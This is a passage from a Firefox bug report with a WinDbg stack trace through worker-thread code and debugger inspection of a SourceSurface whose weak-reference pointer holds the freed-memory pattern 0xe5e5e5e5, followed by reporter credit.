	2c 000000ff`ebb7ee30 00007ff9`cfeabbe2 xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281] 
	2d 000000ff`ebb7ef30 00007ff9`d07d9dce xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049] 
	2e 000000ff`ebb7f0c0 00007ff9`d07d8985 xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2f (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
	30 000000ff`ebb7f460 00007ff9`cf93340f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
	31 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381] 
	32 000000ff`ebb7f510 00007ff9`cef5fc7e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375] 
	33 000000ff`ebb7f560 00007ff9`cf775f03 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357] 
	34 000000ff`ebb7f5c0 00007ffa`0ebc577c xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393] 
	35 000000ff`ebb7f780 00007ffa`0ec4a411 nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	36 000000ff`ebb7f800 00007ffa`5c849363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	37 000000ff`ebb7f830 00007ffa`5dc626bd ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	38 000000ff`ebb7f860 00007ffa`1f6251c8 KERNEL32!BaseThreadInitThunk+0x1d
	39 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	3a 000000ff`ebb7f890 00007ffa`5ecca9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592] 
	3b 000000ff`ebb7f900 00000000`00000000 ntdll!RtlUserThreadStart+0x28
	9:318> dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
	((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
		[+0x008] mWeakRef         [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
		[+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
	9:318> dx -id 0,9 -r1 (*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))
	(*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))                 [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
		[+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
	9:318> dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
	((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
		[+0x000] mRefCnt          [Type: mozilla::detail::RC<unsigned long long,0>]
		[+0x008] mStrongCnt       [Type: mozilla::detail::RC<unsigned long long,0>]
		[+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5



	
CREDIT INFORMATION
Reporter credit: Looben Yang

Back to Bug 1823365 Comment 0